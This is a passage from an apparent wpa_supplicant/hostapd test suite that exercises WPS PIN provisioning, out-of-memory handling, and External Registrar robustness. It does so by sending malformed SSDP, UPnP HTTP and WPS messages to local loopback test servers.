hapd2.request("WPS_PIN any " + pin)
dev[0].wait_disconnected(timeout=15)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("No CTRL-EVENT-EAP-STARTED for the second AP")
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=15)
if ev is None:
raise Exception("No WPS-CRED-RECEIVED for the second AP")
dev[0].wait_connected(timeout=15)
@remote_compatible
def test_ap_wps_priority(dev, apdev):
"""WPS PIN provisioning with configured AP and wps_priority"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
try:
dev[0].request("SET wps_priority 6")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
netw = dev[0].list_networks()
prio = dev[0].get_network(netw[0]['id'], 'priority')
if prio != '6':
raise Exception("Unexpected network priority: " + prio)
finally:
dev[0].request("SET wps_priority 0")
@remote_compatible
def test_ap_wps_and_non_wps(dev, apdev):
"""WPS and non-WPS AP in single hostapd process"""
params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "no wps" }
hapd2 = hostapd.add_ap(apdev[1], params)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
if appin not in hapd.request("WPS_AP_PIN get"):
raise Exception("Could not fetch current AP PIN")
if "FAIL" in hapd.request("WPS_PBC"):
raise Exception("WPS_PBC failed")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
def test_ap_wps_init_oom(dev, apdev):
"""Initial AP configuration and OOM during PSK generation"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(hapd, 1, "base64_gen_encode;?base64_encode;wps_build_cred"):
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_disconnected()
hapd.request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_er_oom(dev, apdev):
"""WPS ER OOM in XML processing"""
try:
_test_ap_wps_er_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
dev[1].request("WPS_CANCEL")
dev[0].request("DISCONNECT")
def _test_ap_wps_er_oom(dev, apdev):
ssid = "wps-er-ap-config"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
dev[0].connect(ssid, psk="12345678", scan_freq="2412")
with alloc_fail(dev[0], 1,
"base64_gen_decode;?base64_decode;xml_get_base64_item"):
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=3)
if ev is not None:
raise Exception("Unexpected AP discovery")
dev[0].request("WPS_ER_STOP")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("AP discovery timed out")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
with alloc_fail(dev[0], 1,
"base64_gen_decode;?base64_decode;xml_get_base64_item"):
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], timeout=10)
if ev is None:
raise Exception("PBC scan failed")
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=15)
if ev is None:
raise Exception("Enrollee discovery timed out")
@remote_compatible
def test_ap_wps_er_init_oom(dev, apdev):
"""WPS ER and OOM during init"""
try:
_test_ap_wps_er_init_oom(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_init_oom(dev, apdev):
with alloc_fail(dev[0], 1, "wps_er_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 1, "http_server_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 2, "http_server_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with alloc_fail(dev[0], 1, "eloop_sock_table_add_sock;?eloop_register_sock;wps_er_ssdp_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during OOM")
with fail_test(dev[0], 1, "os_get_random;wps_er_init"):
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo"):
raise Exception("WPS_ER_START succeeded during os_get_random failure")
@remote_compatible
def test_ap_wps_er_init_fail(dev, apdev):
"""WPS ER init failure"""
if "FAIL" not in dev[0].request("WPS_ER_START ifname=does-not-exist"):
dev[0].request("WPS_ER_STOP")
raise Exception("WPS_ER_START with non-existing ifname succeeded")
def test_ap_wps_wpa_cli_action(dev, apdev, test_params):
"""WPS events and wpa_cli action script"""
logdir = os.path.abspath(test_params['logdir'])
pidfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.pid')
logfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.res')
actionfile = os.path.join(logdir, 'ap_wps_wpa_cli_action.wpa_cli.action.sh')
with open(actionfile, 'w') as f:
f.write('#!/bin/sh\n')
f.write('echo $* >> %s\n' % logfile)
# Kill the process and wait some time before returning to allow all the
# pending events to be processed with some of this happening after the
# eloop SIGALRM signal has been scheduled.
f.write('if [ $2 = "WPS-SUCCESS" -a -r %s ]; then kill `cat %s`; sleep 1; fi\n' % (pidfile, pidfile))
os.chmod(actionfile, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC |
stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
prg = os.path.join(test_params['logdir'],
'alt-wpa_supplicant/wpa_supplicant/wpa_cli')
if not os.path.exists(prg):
prg = '../../wpa_supplicant/wpa_cli'
arg = [ prg, '-P', pidfile, '-B', '-i', dev[0].ifname, '-a', actionfile ]
subprocess.call(arg)
arg = [ 'ps', 'ax' ]
cmd = subprocess.Popen(arg, stdout=subprocess.PIPE)
out = cmd.communicate()[0].decode()
cmd.wait()
logger.debug("Processes:\n" + out)
if "wpa_cli -P %s -B -i %s" % (pidfile, dev[0].ifname) not in out:
raise Exception("Did not see wpa_cli running")
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[0].wait_connected(timeout=30)
for i in range(30):
if not os.path.exists(pidfile):
break
time.sleep(0.1)
if not os.path.exists(logfile):
raise Exception("wpa_cli action results file not found")
with open(logfile, 'r') as f:
res = f.read()
if "WPS-SUCCESS" not in res:
raise Exception("WPS-SUCCESS event not seen in action file")
arg = [ 'ps', 'ax' ]
cmd = subprocess.Popen(arg, stdout=subprocess.PIPE)
out = cmd.communicate()[0].decode()
cmd.wait()
logger.debug("Remaining processes:\n" + out)
if "wpa_cli -P %s -B -i %s" % (pidfile, dev[0].ifname) in out:
raise Exception("wpa_cli still running")
if os.path.exists(pidfile):
raise Exception("PID file not removed")
def test_ap_wps_er_ssdp_proto(dev, apdev):
"""WPS ER SSDP protocol testing"""
try:
_test_ap_wps_er_ssdp_proto(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_ssdp_proto(dev, apdev):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
if "FAIL" not in dev[0].request("WPS_ER_START ifname=lo foo"):
raise Exception("Invalid filter accepted")
if "OK" not in dev[0].request("WPS_ER_START ifname=lo 1.2.3.4"):
raise Exception("WPS_ER_START with filter failed")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"FOO", addr)
time.sleep(0.1)
dev[0].request("WPS_ER_STOP")
dev[0].request("WPS_ER_START ifname=lo")
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" not in msg:
raise Exception("Not an M-SEARCH")
sock.sendto(b"FOO", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nFOO\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nNTS:foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nNTS:ssdp:byebye\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\ncache-control: foo=1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\ncache-control: max-age=1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn:\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn:foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid:\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid: \r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nusn: uuid: foo\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nNTS:ssdp:byebye\r\n\r\n", addr)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\n\r\n", addr)
with alloc_fail(dev[0], 1, "wps_er_ap_add"):
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
time.sleep(0.1)
with alloc_fail(dev[0], 2, "wps_er_ap_add"):
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
time.sleep(0.1)
# Add an AP with bogus URL
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:foo\r\ncache-control:max-age=1\r\n\r\n", addr)
# Update timeout on AP without updating URL
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1:12345/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
# Add an AP with a valid URL (but no server listing to it)
sock.sendto(b"HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:http://127.0.0.1:12345/foo.xml\r\ncache-control:max-age=1\r\n\r\n", addr)
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
sock.close()
wps_event_url = None
def gen_upnp_info(eventSubURL='wps_event', controlURL='wps_control',
udn='uuid:27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'):
payload = '''<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
<deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
<friendlyName>WPS Access Point</friendlyName>
<manufacturer>Company</manufacturer>
<modelName>WAP</modelName>
<modelNumber>123</modelNumber>
<serialNumber>12345</serialNumber>
'''
if udn:
payload += '<UDN>' + udn + '</UDN>'
payload += '''<serviceList>
<service>
<serviceType>urn:schemas-wifialliance-org:service:WFAWLANConfig:1</serviceType>
<serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
<SCPDURL>wps_scpd.xml</SCPDURL>
'''
if controlURL:
payload += '<controlURL>' + controlURL + '</controlURL>\n'
if eventSubURL:
payload += '<eventSubURL>' + eventSubURL + '</eventSubURL>\n'
payload += '''</service>
</serviceList>
</device>
</root>
'''
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
def gen_wps_control(payload_override=None):
payload = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetDeviceInfoResponse xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewDeviceInfo>EEoAARAQIgABBBBHABAn6oAanlxOc72C+Jy80Q1+ECAABgIAAAADABAaABCJZ7DPtbU3Ust9
Z3wJF07WEDIAwH45D3i1OqB7eJGwTzqeapS71h3KyXncK2xJZ+xqScrlorNEg6LijBJzG2Ca
+FZli0iliDJd397yAx/jk4nFXco3q5ylBSvSw9dhJ5u1xBKSnTilKGlUHPhLP75PUqM3fot9
7zwtFZ4bx6x1sBA6oEe2d0aUJmLumQGCiKEIWlnxs44zego/2tAe81bDzdPBM7o5HH/FUhD+
KoGzFXp51atP+1n9Vta6AkI0Vye99JKLcC6Md9dMJltSVBgd4Xc4lRAEAAIAIxAQAAIADRAN
AAEBEAgAAgAEEEQAAQIQIQAHQ29tcGFueRAjAANXQVAQJAADMTIzEEIABTEyMzQ1EFQACAAG
AFDyBAABEBEAC1dpcmVsZXNzIEFQEDwAAQEQAgACAAAQEgACAAAQCQACAAAQLQAEgQIDABBJ
AAYANyoAASA=
</NewDeviceInfo>
</u:GetDeviceInfoResponse>
</s:Body>
</s:Envelope>
'''
if payload_override:
payload = payload_override
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
def gen_wps_event(sid='uuid:7eb3342a-8a5f-47fe-a585-0785bfec6d8a'):
payload = ""
hdr = 'HTTP/1.1 200 OK\r\n' + \
'Content-Type: text/xml; charset="utf-8"\r\n' + \
'Server: Unspecified, UPnP/1.0, Unspecified\r\n' + \
'Connection: close\r\n' + \
'Content-Length: ' + str(len(payload)) + '\r\n'
if sid:
hdr += 'SID: ' + sid + '\r\n'
hdr += 'Timeout: Second-1801\r\n' + \
'Date: Sat, 15 Aug 2015 18:55:08 GMT\r\n\r\n'
return (hdr + payload).encode()
class WPSAPHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().decode().strip()
logger.info("HTTP server received: " + data)
while True:
hdr = self.rfile.readline().decode().strip()
if len(hdr) == 0:
break
logger.info("HTTP header: " + hdr)
if "CALLBACK:" in hdr:
global wps_event_url
wps_event_url = hdr.split(' ')[1].strip('<>')
if "GET /foo.xml" in data:
self.handle_upnp_info()
elif "POST /wps_control" in data:
self.handle_wps_control()
elif "SUBSCRIBE /wps_event" in data:
self.handle_wps_event()
else:
self.handle_others(data)
def handle_upnp_info(self):
self.wfile.write(gen_upnp_info())
def handle_wps_control(self):
self.wfile.write(gen_wps_control())
def handle_wps_event(self):
self.wfile.write(gen_wps_event())
def handle_others(self, data):
logger.info("Ignore HTTP request: " + data)
class MyTCPServer(TCPServer):
def __init__(self, addr, handler):
self.allow_reuse_address = True
TCPServer.__init__(self, addr, handler)
def wps_er_start(dev, http_server, max_age=1, wait_m_search=False,
location_url=None):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("239.255.255.250", 1900))
dev.request("WPS_ER_START ifname=lo")
for i in range(100):
(msg,addr) = sock.recvfrom(1000)
msg = msg.decode()
logger.debug("Received SSDP message from %s: %s" % (str(addr), msg))
if "M-SEARCH" in msg:
break
if not wait_m_search:
raise Exception("Not an M-SEARCH")
if i == 99:
raise Exception("No M-SEARCH seen")
# Add an AP with a valid URL and server listing to it
server = MyTCPServer(("127.0.0.1", 12345), http_server)
if not location_url:
location_url = 'http://127.0.0.1:12345/foo.xml'
sock.sendto(("HTTP/1.1 200 OK\r\nST: urn:schemas-wifialliance-org:device:WFADevice:1\r\nlocation:%s\r\ncache-control:max-age=%d\r\n\r\n" % (location_url, max_age)).encode(), addr)
server.timeout = 1
return server,sock
def wps_er_stop(dev, sock, server, on_alloc_fail=False):
sock.close()
server.server_close()
if on_alloc_fail:
done = False
for i in range(50):
res = dev.request("GET_ALLOC_FAIL")
if res.startswith("0:"):
done = True
break
time.sleep(0.1)
if not done:
raise Exception("No allocation failure reported")
else:
ev = dev.wait_event(["WPS-ER-AP-REMOVE"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-AP-REMOVE event on max-age timeout")
dev.request("WPS_ER_STOP")
def run_wps_er_proto_test(dev, handler, no_event_url=False, location_url=None):
try:
uuid = '27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'
server,sock = wps_er_start(dev, handler, location_url=location_url)
global wps_event_url
wps_event_url = None
server.handle_request()
server.handle_request()
server.handle_request()
server.server_close()
if no_event_url:
if wps_event_url:
raise Exception("Received event URL unexpectedly")
return
if wps_event_url is None:
raise Exception("Did not get event URL")
logger.info("Event URL: " + wps_event_url)
finally:
dev.request("WPS_ER_STOP")
def send_wlanevent(url, uuid, data, no_response=False):
conn = HTTPConnection(url.netloc)
payload = '''<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
<e:property><STAStatus>1</STAStatus></e:property>
<e:property><APStatus>1</APStatus></e:property>
<e:property><WLANEvent>'''
payload += base64.b64encode(data).decode()
payload += '</WLANEvent></e:property></e:propertyset>'
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
if no_response:
try:
conn.getresponse()
except Exception as e:
pass
return
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
def test_ap_wps_er_http_proto(dev, apdev):
"""WPS ER HTTP protocol testing"""
try:
_test_ap_wps_er_http_proto(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_http_proto(dev, apdev):
uuid = '27ea801a-9e5c-4e73-bd82-f89cbcd10d7e'
server,sock = wps_er_start(dev[0], WPSAPHTTPServer, max_age=15)
global wps_event_url
wps_event_url = None
server.handle_request()
server.handle_request()
server.handle_request()
server.server_close()
if wps_event_url is None:
raise Exception("Did not get event URL")
logger.info("Event URL: " + wps_event_url)
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=10)
if ev is None:
raise Exception("No WPS-ER-AP-ADD event")
if uuid not in ev:
raise Exception("UUID mismatch")
sock.close()
logger.info("Valid Probe Request notification")
url = urlparse(wps_event_url)
conn = HTTPConnection(url.netloc)
payload = '''<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
<e:property><STAStatus>1</STAStatus></e:property>
<e:property><APStatus>1</APStatus></e:property>
<e:property><WLANEvent>ATAyOjAwOjAwOjAwOjAwOjAwEEoAARAQOgABAhAIAAIxSBBHABA2LbR7pTpRkYj7VFi5hrLk
EFQACAAAAAAAAAAAEDwAAQMQAgACAAAQCQACAAAQEgACAAAQIQABIBAjAAEgECQAASAQEQAI
RGV2aWNlIEEQSQAGADcqAAEg
</WLANEvent></e:property>
</e:propertyset>
'''
headers = { "Content-type": 'text/xml; charset="utf-8"',
"Server": "Unspecified, UPnP/1.0, Unspecified",
"HOST": url.netloc,
"NT": "upnp:event",
"SID": "uuid:" + uuid,
"SEQ": "0",
"Content-Length": str(len(payload)) }
conn.request("NOTIFY", url.path, payload, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=5)
if ev is None:
raise Exception("No WPS-ER-ENROLLEE-ADD event")
if "362db47b-a53a-5191-88fb-5458b986b2e4" not in ev:
raise Exception("No Enrollee UUID match")
logger.info("Incorrect event URL AP id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", url.path + '123', payload, headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Missing AP id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/event/' + url.path.split('/')[2],
payload, headers)
time.sleep(0.1)
logger.info("Incorrect event URL event id")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/event/123456789/123', payload, headers)
time.sleep(0.1)
logger.info("Incorrect event URL prefix")
conn = HTTPConnection(url.netloc)
conn.request("NOTIFY", '/foobar/123456789/123', payload, headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Unsupported request")
conn = HTTPConnection(url.netloc)
conn.request("FOOBAR", '/foobar/123456789/123', payload, headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.info("Unsupported request and OOM")
with alloc_fail(dev[0], 1, "wps_er_http_req"):
conn = HTTPConnection(url.netloc)
conn.request("FOOBAR", '/foobar/123456789/123', payload, headers)
time.sleep(0.5)
logger.info("Too short WLANEvent")
data = b'\x00'
send_wlanevent(url, uuid, data)
logger.info("Invalid WLANEventMAC")
data = b'\x00qwertyuiopasdfghjklzxcvbnm'
send_wlanevent(url, uuid, data)
logger.info("Unknown WLANEventType")
data = b'\xff02:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("Probe Request notification without any attributes")
data = b'\x0102:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("Probe Request notification with invalid attribute")
data = b'\x0102:00:00:00:00:00\xff'
send_wlanevent(url, uuid, data)
logger.info("EAP message without any attributes")
data = b'\x0202:00:00:00:00:00'
send_wlanevent(url, uuid, data)
logger.info("EAP message with invalid attribute")
data = b'\x0202:00:00:00:00:00\xff'
send_wlanevent(url, uuid, data)
logger.info("EAP message from new STA and not M1")
data = b'\x0202:ff:ff:ff:ff:ff' + b'\x10\x22\x00\x01\x05'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x22\x00\x01\x04'
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
data += b'\x10\x04\x00\x02\x00\x00'
data += b'\x10\x10\x00\x02\x00\x00'
data += b'\x10\x0d\x00\x01\x00'
data += b'\x10\x08\x00\x02\x00\x00'
data += b'\x10\x44\x00\x01\x00'
data += b'\x10\x21\x00\x00'
data += b'\x10\x23\x00\x00'
data += b'\x10\x24\x00\x00'
data += b'\x10\x42\x00\x00'
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
data += b'\x10\x11\x00\x00'
data += b'\x10\x3c\x00\x01\x00'
data += b'\x10\x02\x00\x02\x00\x00'
data += b'\x10\x12\x00\x02\x00\x00'
data += b'\x10\x09\x00\x02\x00\x00'
data += b'\x10\x2d\x00\x04\x00\x00\x00\x00'
m1 = data
send_wlanevent(url, uuid, data)
logger.info("EAP message: WSC_ACK")
data = b'\x0202:00:00:00:00:00' + b'\x10\x22\x00\x01\x0d'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1")
send_wlanevent(url, uuid, m1)
logger.info("EAP message: WSC_NACK")
data = b'\x0202:00:00:00:00:00' + b'\x10\x22\x00\x01\x0e'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 - Too long attribute values")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x11\x00\x21' + 33 * b'\x00'
data += b'\x10\x45\x00\x21' + 33 * b'\x00'
data += b'\x10\x42\x00\x21' + 33 * b'\x00'
data += b'\x10\x24\x00\x21' + 33 * b'\x00'
data += b'\x10\x23\x00\x21' + 33 * b'\x00'
data += b'\x10\x21\x00\x41' + 65 * b'\x00'
data += b'\x10\x49\x00\x09\x00\x37\x2a\x05\x02\x00\x00\x05\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing UUID-E")
data = b'\x0202:00:00:00:00:00'
data += b'\x10\x22\x00\x01\x04'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing MAC Address")
data += b'\x10\x47\x00\x10' + 16 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Enrollee Nonce")
data += b'\x10\x20\x00\x06\x02\x00\x00\x00\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Public Key")
data += b'\x10\x1a\x00\x10' + 16 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Authentication Type flags")
data += b'\x10\x32\x00\xc0' + 192 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Encryption Type Flags")
data += b'\x10\x04\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Connection Type flags")
data += b'\x10\x10\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Config Methods")
data += b'\x10\x0d\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Wi-Fi Protected Setup State")
data += b'\x10\x08\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Manufacturer")
data += b'\x10\x44\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Model Name")
data += b'\x10\x21\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Model Number")
data += b'\x10\x23\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Serial Number")
data += b'\x10\x24\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Primary Device Type")
data += b'\x10\x42\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Device Name")
data += b'\x10\x54\x00\x08' + 8 * b'\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing RF Bands")
data += b'\x10\x11\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Association State")
data += b'\x10\x3c\x00\x01\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Device Password ID")
data += b'\x10\x02\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing Configuration Error")
data += b'\x10\x12\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("EAP message: M1 missing OS Version")
data += b'\x10\x09\x00\x02\x00\x00'
send_wlanevent(url, uuid, data)
logger.info("Check max concurrent requests")
addr = (url.hostname, url.port)
socks = {}
for i in range(20):
socks[i] = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
socks[i].settimeout(10)
socks[i].connect(addr)
for i in range(20):
socks[i].send(b"GET / HTTP/1.1\r\n\r\n")
count = 0
for i in range(20):
try:
res = socks[i].recv(100).decode()
if "HTTP/1" in res:
count += 1
else:
logger.info("recv[%d]: len=%d" % (i, len(res)))
except:
pass
socks[i].close()
logger.info("%d concurrent HTTP GET operations returned response" % count)
if count < 8:
raise Exception("Too few concurrent HTTP connections accepted")
logger.info("OOM in HTTP server")
for func in [ "http_request_init", "httpread_create",
"eloop_register_timeout;httpread_create",
